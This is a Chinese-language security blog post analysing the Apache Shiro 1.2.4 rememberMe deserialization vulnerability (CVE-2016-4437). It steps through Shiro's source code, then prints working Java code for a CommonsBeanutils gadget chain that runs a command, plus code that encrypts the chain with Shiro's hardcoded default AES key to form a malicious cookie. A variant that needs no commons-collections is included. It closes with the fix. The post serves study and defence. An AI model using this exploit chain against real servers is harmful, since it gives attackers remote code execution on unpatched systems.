shiro-web CVE-2016-4437

2024-11-15 182 0

[condition] shiro <= 1.2.4

[description]密钥被硬编码在shiro组件中,密钥泄露,从而导致反序列化漏洞
shiro-web CVE-2016-4437插图

漏洞环境

springBoot:vulnEnv/shiro-550/ShiroEnv at main · dota-st/vulnEnv (github.com)

noSpringBoot:vulnEnv/vulEnv/shiro/cve-2014-0074/shiroEnvNoSpring at main · majic-banana/vulnEnv (github.com)

漏洞分析

登入请求

该漏洞不用登入也能利用,这里只是补充知识,为了更加了解shiro

payload:

POST /login HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://localhost:8081/login
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://localhost:8081
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Cookie: JSESSIONID=D66AB6FAED40249AE0B02DE87C805CE9
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Pragma: no-cache
Cache-Control: no-cache

username=user&password=123456&rememberMe=true

根据shiro.ini 配置,该请求的FilterChain中只有一个name为“authc ”的Filter,也就是FormedAuthenticationFilter,所以直接从它的doFilter()方法开始分析

shiro-web CVE-2016-4437插图1

ProxiedFilterChain是一个重要节点,shiro-web中有讲

this.filters : 也就是我们配置的FilterChian 其名字是请求路径 /login

这个链中只有一个名字为authc 的Filter :FormedAuthenticationFilter

shiro login 总体流程:

shiro-web CVE-2016-4437插图2

以下分析会出现很多,父类子类互相调用的情况,如果不太清楚继承结构可看shiro-web 框架分析

//AccessControlFilter::

public boolean onPreHandle(ServletRequest request, ServletResponse response, Object mappedValue) throws Exception {
        return isAccessAllowed(request, response, mappedValue) || onAccessDenied(request, response, mappedValue);
    }

//AuthenticatedFilter::
protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
        return super.isAccessAllowed(request, response, mappedValue) ||
                (!isLoginRequest(request, response) && isPermissive(mappedValue));
    }


//AuthenticationFilter
protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
        Subject subject = getSubject(request, response);
        return subject.isAuthenticated();
    }

因为当前是第一次登入,所以subject.isAuthenticated()为false ,其当前的确是登入请求故!isLoginRequest(request, response) == false

permisive是特殊权限,需要配置选项,我们没有配置,所以也为false ;故来到onAcessDenied

//FormedAuthenticationFilter::
protected boolean onAccessDenied(ServletRequest request, ServletResponse response) throws Exception {
        if (isLoginRequest(request, response)) {
            if (isLoginSubmission(request, response)) {   //只要是Post请求,就为true
                if (log.isTraceEnabled()) {
                    log.trace("Login submission detected.  Attempting to execute login.");
                }
                return executeLogin(request, response);
            } else {
                if (log.isTraceEnabled()) {
                    log.trace("Login page view.");
                }
                //allow them to see the login page ;)
                return true;
            }
        } else {
            if (log.isTraceEnabled()) {
                log.trace("Attempting to access a path which requires authentication.  Forwarding to the " +
                        "Authentication url [" + getLoginUrl() + "]");
            }

            saveRequestAndRedirectToLogin(request, response);
            return false;
        }
    }

很明显这里有两个分支,一个是login page,一个是login submission (这也是为什么login页面的表单中action不要设置为其他路径,必须是同路径,不然无法进入executeLogin()

入口


//AuthenticatingFilter::
protected boolean executeLogin(ServletRequest request, ServletResponse response) throws Exception {
        AuthenticationToken token = createToken(request, response);
        if (token == null) {
            String msg = "createToken method implementation returned null. A valid non-null AuthenticationToken " +
                    "must be created in order to execute a login attempt.";
            throw new IllegalStateException(msg);
        }
        try {
            Subject subject = getSubject(request, response);
            subject.login(token);
            return onLoginSuccess(token, subject, request, response);
        } catch (AuthenticationException e) {
            return onLoginFailure(token, e, request, response);
        }
    }

生成token:

//FormedAuthentication::
protected AuthenticationToken createToken(ServletRequest request, ServletResponse response) {
        String username = getUsername(request);
        String password = getPassword(request);
        return createToken(username, password, request, response);
    }


//AuthenticatingFilter::
protected AuthenticationToken createToken(String username, String password,
                                              ServletRequest request, ServletResponse response) {
    	//解析请求参数rememberMe,在我们的payload中添加了这一参数,value为true,所以这里返回true
        boolean rememberMe = isRememberMe(request);
        String host = getHost(request);
    	
        return createToken(username, password, rememberMe, host);
    }

//AuthenticatingFilter::
protected AuthenticationToken createToken(String username, String password,
                                              boolean rememberMe, String host) {
        return new UsernamePasswordToken(username, password, rememberMe, host);
    }

登入的核心逻辑

//DefaultSecurityManager::

public Subject login(Subject subject, AuthenticationToken token) throws AuthenticationException {
        AuthenticationInfo info;
        try {
            //委托给Authenticator去验证,其验证流程在shiro-core中有分析
            info = authenticate(token);
        } catch (AuthenticationException ae) {
            try {
                onFailedLogin(token, ae, subject);
            } catch (Exception e) {
                if (log.isInfoEnabled()) {
                    log.info("onFailedLogin method threw an " +
                            "exception.  Logging and propagating original AuthenticationException.", e);
                }
            }
            throw ae; //propagate
        }
		
    	
        Subject loggedIn = createSubject(token, info, subject);

        onSuccessfulLogin(token, info, loggedIn);

        return loggedIn;
    }

//
protected Subject createSubject(AuthenticationToken token, AuthenticationInfo info, Subject existing) {
        SubjectContext context = createSubjectContext();
        context.setAuthenticated(true);
        context.setAuthenticationToken(token);
        context.setAuthenticationInfo(info);
        if (existing != null) {
            //这里应该是为了SubjectFactory根据context构造subjct时不重新new一个,而是在原来基础上进行完善
            context.setSubject(existing);
        }

        return createSubject(context);
    }

然后来到我们熟悉的核心函数:

//DefaultSecurityManager

shiro-web CVE-2016-4437插图3

在resolveSession时,我们之前即没有往context设置session,且我们使用的是Servlet容器的session管理,sessionid 如果没过期则session不为空,但每次登入请求都会更新session这时save(subject)

保存subject


//DefaultSecurityManager::
protected void save(Subject subject) {
        this.subjectDAO.save(subject);
    }


//DefaultSubjectDAO::
public Subject save(Subject subject) {
        if (isSessionStorageEnabled(subject)) {
            saveToSession(subject);
        } else {
            log.trace("Session storage of subject state for Subject [{}] has been disabled: identity and " +
                    "authentication state are expected to be initialized on every request or invocation.", subject);
        }

        return subject;
    }

protected void saveToSession(Subject subject) {
        //performs merge logic, only updating the Subject's session if it does not match the current state:

 //subject.session存储了旧的principal和旧的authentication information,所以可能需要更新为当前subject中存储的新的状态
        mergePrincipals(subject);
        mergeAuthenticationState(subject);
    }

更新principal

protected void mergePrincipals(Subject subject) {
        //merge PrincipalCollection state:
		

        PrincipalCollection currentPrincipals = null;
		
        //一般不会进入
        if (subject.isRunAs() && subject instanceof DelegatingSubject) {
            try {
                Field field = DelegatingSubject.class.getDeclaredField("principals");
                field.setAccessible(true);
                currentPrincipals = (PrincipalCollection)field.get(subject);
            } catch (Exception e) {
                throw new IllegalStateException("Unable to access DelegatingSubject principals property.", e);
            }
        }

    	//获取请求中的新的principal
        if (currentPrincipals == null || currentPrincipals.isEmpty()) {
            currentPrincipals = subject.getPrincipals();
        }

        Session session = subject.getSession(false);

        if (session == null) {
            if (!CollectionUtils.isEmpty(currentPrincipals)) {
                //底层调用的是subject.getSession(true),即如果没有则创建一个新的
                //且先代理给SecurityManger 再代理给SessionManager,这里不展开,不了解可以看shiro-core框架分析
                session = subject.getSession();
                //注入principal
                session.setAttribute(DefaultSubjectContext.PRINCIPALS_SESSION_KEY, currentPrincipals);
            }
            //otherwise no session and no principals - nothing to save
        } else {

            //获取当前sesssion中的现存Principal  :old
            PrincipalCollection existingPrincipals =
                    (PrincipalCollection)
                session.getAttribute(DefaultSubjectContext.PRINCIPALS_SESSION_KEY);
			

            if (CollectionUtils.isEmpty(currentPrincipals)) {
                if (!CollectionUtils.isEmpty(existingPrincipals)) {
                    //如果新principal为空,但旧principal不为空,则更新,也就是去除当前参数
                    session.removeAttribute(DefaultSubjectContext.PRINCIPALS_SESSION_KEY);
                }
                //otherwise both are null or empty - no need to update the session
            } else {
                //新旧不一样
                if (!currentPrincipals.equals(existingPrincipals)) {
                    session.setAttribute(DefaultSubjectContext.PRINCIPALS_SESSION_KEY, currentPrincipals);
                }
                //otherwise they're the same - no need to update the session
            }
        }
    }

进入分支:session==null

shiro-web CVE-2016-4437插图4

由于shiro-web默认启用HttpSession (即用servlet容器管理session) :图中ServletContainerSessionManager就是证明

shiro-web CVE-2016-4437插图5

对外返回一个 被包装过的Session: (为了统一接口)

shiro-web CVE-2016-4437插图6

更新验证状态:

shiro-web CVE-2016-4437插图7

开始remberMe:

onSucessfulLogin后面没有展开,只展示关键代码

convertPrincipalsToBytes(): 序列化principal 并对其进行加密

remberSerializaedIdentity():bytes进行base64编码,然后将结果设置到response的cookie中 (不展开)

shiro-web CVE-2016-4437插图8

//AbstractRememberMeManager::
//This implementation first serializes the principals to a byte array and then encrypts that byte array.
    protected byte[] convertPrincipalsToBytes(PrincipalCollection principals) {
        byte[] bytes = serialize(principals);
        if (getCipherService() != null) {
            //加密序列化数据
            bytes = encrypt(bytes);
        }
        return bytes;
    }


protected byte[] encrypt(byte[] serialized) {
        byte[] value = serialized;
    	//密码服务 默认为AES(对称密码)
        CipherService cipherService = getCipherService();
        if (cipherService != null) {
            ByteSource byteSource = cipherService.encrypt(serialized, getEncryptionCipherKey());
            value = byteSource.getBytes();
        }
        return value;
    }

----------------
public byte[] getEncryptionCipherKey() {
        return encryptionCipherKey;
    }
-------------------
//Default constructor that initializes a DefaultSerializer as the serializer and an AesCipherService as the cipherService.
public AbstractRememberMeManager() {
        this.serializer = new DefaultSerializer<PrincipalCollection>();
        this.cipherService = new AesCipherService();

    	//设置加密解密密钥
        setCipherKey(DEFAULT_CIPHER_KEY_BYTES);
    }

public void setCipherKey(byte[] cipherKey) {
        //Since this method should only be used in symmetric ciphers
        //(where the enc and dec keys are the same), set it on both:
        setEncryptionCipherKey(cipherKey);
        setDecryptionCipherKey(cipherKey);
    }

固定密钥

shiro-web CVE-2016-4437插图

之后就是servlet对request,response进行相关操作了,不属于shiro范围

结果:

shiro-web CVE-2016-4437插图9

操作请求

首先我们先准备好payload

  1. 生成序列化数据:CB链

package com.unserialization.cb;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import org.apache.commons.beanutils.BeanComparator;
import utils.reflection.Reflection;

import java.io.*;
import java.util.PriorityQueue;

public class CB1 {

    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, NotFoundException, IOException, CannotCompileException, ClassNotFoundException {
        try {
            CB1 cb1 = new CB1();
            //我们只进行序列化
            cb1.serialize();

        }catch (Exception e){
            e.printStackTrace();
        }
    }


    public void serialize() throws Exception{
        //动态创建字节码
        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";
        ClassPool pool = ClassPool.getDefault();
        CtClass ctClass = pool.makeClass("EVil");
        //插入到static代码段
        ctClass.makeClassInitializer().insertBefore(cmd);
        ctClass.setSuperclass(pool.get(AbstractTranslet.class.getName()));
        byte[] bytes = ctClass.toBytecode();

        TemplatesImpl templates = new TemplatesImpl();
        Reflection.setFieldValue(templates, "_name", "RoboTerh");
        Reflection.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
        Reflection.setFieldValue(templates, "_bytecodes", new byte[][]{bytes});

        //创建比较器
        BeanComparator beanComparator = new BeanComparator();
        PriorityQueue queue = new PriorityQueue(2, beanComparator);
        queue.add(1);
        queue.add(1);

        //反射赋值
        //这是我自己写的小封装,用来精简代码
        Reflection.setFieldValue(beanComparator, "property", "outputProperties");
        Reflection.setFieldValue(queue, "queue", new Object[]{templates, templates});

        //序列化到文件1.txt
        FileOutputStream fileOutputStream = new FileOutputStream("1.txt");
        // 创建并实例化对象输出流
        ObjectOutputStream out = new ObjectOutputStream(fileOutputStream);
        out.writeObject(queue);

    }

}
  1. 利用shiro中的模块对序列化数据进行加密

import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;

import java.io.*;

/**
 * Created by dotast on 2022/10/10 10:45
 */
public class Shiro550 {
    public static void main(String[] args) throws Exception {
        //仿照shiro加密流程对恶意序列化数据进行加密:
        String path = "1.txt";
        byte[] key = Base64.decode("kPH+bIxk5D2deZiIxcaaaA==");
        AesCipherService aes = new AesCipherService();
        ByteSource ciphertext = aes.encrypt(getBytes(path), key);



        try {
            BufferedWriter writer = new BufferedWriter(new FileWriter("output.txt"));
            writer.write("");
            writer.write(ciphertext.toString());
            writer.flush();
            writer.close();
        } catch (IOException e) {
            e.printStackTrace();
            System.out.println("Error: " + e.getMessage());
        }
    }


    public static byte[] getBytes(String path) throws Exception{
        InputStream inputStream = new FileInputStream(path);
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        int n = 0;
        while ((n=inputStream.read())!=-1){
            byteArrayOutputStream.write(n);
        }
        byte[] bytes = byteArrayOutputStream.toByteArray();
        return bytes;

    }
}

生成payload:
在shiro-web中已经讲过,每次请求过来都会在ShrioFilter这个分支创建subject,其利用点也就在
SecurityManger::
shiro-web CVE-2016-4437插图10
进入resolvePrincipal(context)::
shiro-web CVE-2016-4437插图11
可以看到在标红代码行处,找不到principal才会尝试查找rememberMe
进入context.resolvePrincipal()

public PrincipalCollection resolvePrincipals() {
        PrincipalCollection principals = getPrincipals();


        if (CollectionUtils.isEmpty(principals)) {
            //check to see if they were just authenticated:
            AuthenticationInfo info = getAuthenticationInfo();
            if (info != null) {
                principals = info.getPrincipals();
            }
        }

        if (CollectionUtils.isEmpty(principals)) {
            Subject subject = getSubject();
            if (subject != null) {
                principals = subject.getPrincipals();
            }
        }

    	//以上两个分支,由于是第一次创建subject,所以principal都找不到

        if (CollectionUtils.isEmpty(principals)) {
            //try the session:
            //如果session有效则直接从session中获取principal(之前在登入请求中save(subject)有讲)
            Session session = resolveSession();
            if (session != null) {
                principals = (PrincipalCollection) session.getAttribute(PRINCIPALS_SESSION_KEY);
            }
        }

        return principals;
    }

所以我们的session必须不存在,也就是sessionid必须无效。所以才说不用登入也能利用
进入getRememberedIdentity():

protected PrincipalCollection getRememberedIdentity(SubjectContext subjectContext) {
        RememberMeManager rmm = getRememberMeManager();
        if (rmm != null) {
            try {
                return rmm.getRememberedPrincipals(subjectContext);
            } catch (Exception e) {
                if (log.isWarnEnabled()) {
                    String msg = "Delegate RememberMeManager instance of type [" + rmm.getClass().getName() +
                            "] threw an exception during getRememberedPrincipals().";
                    log.warn(msg, e);
                }
            }
        }
        return null;
    }
}

进入rmm.getRememberedPrincipals(subjectContext)

public PrincipalCollection getRememberedPrincipals(SubjectContext subjectContext) {
        PrincipalCollection principals = null;
        try {

            //从request中读取rememberMe,然后还原出其加密后的序列化数据(
            //base64(encrypt(serializedData)) --> encrypt(serializedData)
            byte[] bytes = getRememberedSerializedIdentity(subjectContext);
            //SHIRO-138 - only call convertBytesToPrincipals if bytes exist:
            if (bytes != null && bytes.length > 0) {
                //开始反序列化!!
                principals = convertBytesToPrincipals(bytes, subjectContext);
            }
        } catch (RuntimeException re) {
            principals = onRememberedPrincipalFailure(re, subjectContext);
        }

        return principals;
    }

进入convertBytesToPrincipals()

protected PrincipalCollection convertBytesToPrincipals(byte[] bytes, SubjectContext subjectContext) {
        if (getCipherService() != null) {
            bytes = decrypt(bytes);
        }
        return deserialize(bytes);
    }

不断进入:
1. 没有引入cc依赖:
shiro-web CVE-2016-4437插图12
可以看到无法找到cc中的ComparableComparator
原因在于cb链中的BeanComparator依赖ComparableComparator,但maven依赖树中没有cc
shiro-web CVE-2016-4437插图13
依赖树中没有引入cc原因是:cb中cc是可选依赖,所以在maven递归式解析依赖时cc不会被添加到依赖树中,需要手动添加才可以
shiro-web CVE-2016-4437插图14

cb核心部分(必选部分)没有依赖cc故是可选

  1. 在pom.xml引入cc依赖后:
    shiro-web CVE-2016-4437插图15

我在springboot环境下也调试了,其结果与在原生环境下(只用Tomcat)一致,都是必须要引入cc依赖,才能成功

不引入cc行不行?

我们不用CC中的ComparableComparator,用其他任意的Comparator及其子类,是否可行?,但我又觉得,既然BeanComparator在源码上依赖了cc的ComparableComparator,那么在类加载阶段应该也会加载cc的Comparator,但实则不然:

Shiro安全(三):Shiro自身利用链之CommonsBeanutils_shiro利用链-CSDN博客

我们将Comparator换一下:

package com.unserialization.cb;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import org.apache.commons.beanutils.BeanComparator;
import utils.reflection.Reflection;

import java.io.*;
import java.util.PriorityQueue;

public class CB1 {

    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, NotFoundException, IOException, CannotCompileException, ClassNotFoundException {
        try {
            CB1 cb1 = new CB1();
            cb1.serialize();
            //cb1.unserialize();
        }catch (Exception e){
            e.printStackTrace();
        }
    }


    public void serialize() throws Exception{
        //动态创建字节码
        String cmd = "java.lang.Runtime.getRuntime().exec(\"calc\");";
        ClassPool pool = ClassPool.getDefault();
        CtClass ctClass = pool.makeClass("EVil");
        //插入到static代码段
        ctClass.makeClassInitializer().insertBefore(cmd);
        ctClass.setSuperclass(pool.get(AbstractTranslet.class.getName()));
        byte[] bytes = ctClass.toBytecode();

        TemplatesImpl templates = new TemplatesImpl();
        Reflection.setFieldValue(templates, "_name", "RoboTerh");
        Reflection.setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
        Reflection.setFieldValue(templates, "_bytecodes", new byte[][]{bytes});

        //创建比较器
//        BeanComparator beanComparator = new BeanComparator(); //默认比较器是cc的ComparableComparator
        BeanComparator beanComparator = new BeanComparator(null,String.CASE_INSENSITIVE_ORDER);
        PriorityQueue queue = new PriorityQueue(2, beanComparator);
        //底层会调用comparator,而这个String.CASE_INSENSITIVE_ORDER会做类型检查,故必须要字符串类型
        queue.add("");
        queue.add("");

        //反射赋值
        Reflection.setFieldValue(beanComparator, "property", "outputProperties");
        Reflection.setFieldValue(queue, "queue", new Object[]{templates, templates});

        //序列化
        FileOutputStream fileOutputStream = new FileOutputStream("1.txt");
        // 创建并实例化对象输出流
        ObjectOutputStream out = new ObjectOutputStream(fileOutputStream);
        out.writeObject(queue);

    }

    public void unserialize() throws Exception{
        FileInputStream fis = new FileInputStream("1.txt");
        ObjectInputStream ois = new ObjectInputStream(fis);
        PriorityQueue priorityQueue = (PriorityQueue) ois.readObject();
    }


}

跟着测试了一下:

新的payload
pom.xml有cc 能弹出计算器
pom.xml没有cc 能弹出计算器

结论:行!

为什么?

反序列化大致流程是:

加载类,--> 用特殊的反序列化构造函数创建实例(不是该类的构造函数) -->调用该类的readObject() (如果有的化不然就是默认操作) --> resolveObject()

类加载是按需加载,执行程序时,不会一次性把所有class文件都加载到 jvm 内存里,而是按需加载,但是这个按需的程度值得细究,从结果来看,并不是A类出现B类就必须加载B而是 在程序运行时需要用到的时候才会加载。

**Note that the virtual machine loads only those class files that are needed for the execution of a program.**For example, suppose program execution starts with MyProgram.class. Here are the steps that the virtual machine carries out.

  • The virtual machine has a mechanism for loading class files, for example, by reading the files from disk or by requesting them from the Web; it uses this mechanism to load the contents of the MyProgram class file.

  • If the MyProgram class has instance variables or superclasses of another class type, these class files are loaded as well. (The process of loading all the classes that a given class depends on is called resolving the class.)

  • The virtual machine then executes the main method in MyProgram (which is static, so no instance of a class needs to be created).

  • If the main method or a method that main calls requires additional classes, these are loaded next.
    --- <<Core Java 2 Volume II>> Chapter9. Security

==BeanComparator中只有构造函数依赖cc==

shiro-web CVE-2016-4437插图16

在执行try语块的第一行的过程中就会弹出计算器,并抛出异常:

shiro-web CVE-2016-4437插图17

==而cb链整个反序列化过程中都不会调用BeanComparator的构造函数==

所以推测这个按需加载方法级

补充

这是我在服务器为jdk17的环境下下调试时遇到的Exception:shiro-web CVE-2016-4437插图18

cb链中使用了反射机制,所以导致上述报错

shiro-web CVE-2016-4437插图19

com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
能直接访问,但是无法通过反射访问 ,根据模块化知识,说明这个包被模块java.xml export 了但没有open),所以要么服务端设置相关jvm参数要么 其java.version == 8,不然无法利用成功;

从中可以知道,我们常说的 “jdk版本无限制”(eg : cc6) 是有歧义的,准确的讲是在源码上没有限制,但是模块限制还是存在的。比如

cc6依赖InvokerTransformer,而它又依赖反射机制,所以所有依赖InvokerTransformer的链,都要考虑模块限制。

shiro-web CVE-2016-4437插图20

关于模块限制:

Some tools and libraries use reflection to access parts of the JDK that are meant for internal use only.
This use of reflection negatively impacts the security and maintainability of the JDK. To aid migration, JDK
9 through JDK 16 allowed this reflection to continue, but emitted warnings about illegal reflective access.
However, JDK 17 is strongly encapsulated, so this reflection is no longer permitted by default.
原文

同时,如果对本地绕过模块限制感兴趣的话,推荐阅读:本地高版本jdk模块限制绕过

我在尝试本地模块限制绕过的过程中发现TemplatesImpl所在包并没有导出到未命名模块,(因此在我自定义的未命名模块中无法import,也无法用Class.forName()加载它)但是反序列化时就是能够生成实例(说明它已经被加载了)

环境 反序列化过程中是否能够实例化
web
非web,本地

shiro-web CVE-2016-4437插图21

java.xml 
module java.xml {
    exports javax.xml;
    exports javax.xml.catalog;
    exports javax.xml.datatype;
    exports javax.xml.namespace;
    exports javax.xml.parsers;
    exports javax.xml.stream;
    exports javax.xml.stream.events;
    exports javax.xml.stream.util;
    exports javax.xml.transform;
    exports javax.xml.transform.dom;
    exports javax.xml.transform.sax;
    exports javax.xml.transform.stax;
    exports javax.xml.transform.stream;
    exports javax.xml.validation;
    exports javax.xml.xpath;
    exports org.w3c.dom;
    exports org.w3c.dom.bootstrap;
    exports org.w3c.dom.events;
    exports org.w3c.dom.ls;
    exports org.w3c.dom.ranges;
    exports org.w3c.dom.traversal;
    exports org.w3c.dom.views;
    exports org.xml.sax;
    exports org.xml.sax.ext;
    exports org.xml.sax.helpers;

    exports com.sun.org.apache.xml.internal.dtm to
        java.xml.crypto;
    exports com.sun.org.apache.xml.internal.utils to
        java.xml.crypto;
    exports com.sun.org.apache.xpath.internal to
        java.xml.crypto;
    exports com.sun.org.apache.xpath.internal.compiler to
        java.xml.crypto;
    exports com.sun.org.apache.xpath.internal.functions to
        java.xml.crypto;
    exports com.sun.org.apache.xpath.internal.objects to
        java.xml.crypto;
    exports com.sun.org.apache.xpath.internal.res to
        java.xml.crypto;

    uses javax.xml.datatype.DatatypeFactory;
    uses javax.xml.parsers.DocumentBuilderFactory;
    uses javax.xml.parsers.SAXParserFactory;
    uses javax.xml.stream.XMLEventFactory;
    uses javax.xml.stream.XMLInputFactory;
    uses javax.xml.stream.XMLOutputFactory;
    uses javax.xml.transform.TransformerFactory;
    uses javax.xml.validation.SchemaFactory;
    uses javax.xml.xpath.XPathFactory;
    uses org.xml.sax.XMLReader;
}

按理来讲是不可以的,所以我猜测应该是反序列化相关模块,进行了动态模块包export操作.(但还是不能反射,故没有open)

漏洞修复

在shiro <=1.2.4 如果不设置 CipherKey,则加密密钥为默认密钥,是静态不变。因此只要我们设置了自己密钥就可以防御。
在 Shiro 1.2.5 版本的更新中,用户需要手动配置 CipherKey,如果不设置,将会动态生成一个 CipherKey。

Reference


本地高版本jdk模块限制绕过
JavaSec/12.Shiro at main · Y4tacker/JavaSec (github.com)

dota-st/vulnEnv: 存储漏洞环境仓库 (github.com)

Shiro安全(三):Shiro自身利用链之CommonsBeanutils_shiro利用链-CSDN博客

Tomcat ClassLoader详解-CSDN博客

Idea中tocmat启动 源码调试,如何进入到tomcat内部进行调试?_idea 查看请求是否进入tomcat-CSDN博客

tomcat 如何实现共享jar_tomcat共享jar包-CSDN博客

shiro-web 框架分析


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

如何使用MaskerLogger防止敏感数据发生泄露
docker的使用和遇到的问题解决记录
Vault: 密码管理蓝队篇(上)
APKLeaks:一款针对APK文件的数据收集与分析工具
RequestShield:一款HTTP请求威胁识别与检测工具
2025年十大最佳漏洞管理工具分享

发布评论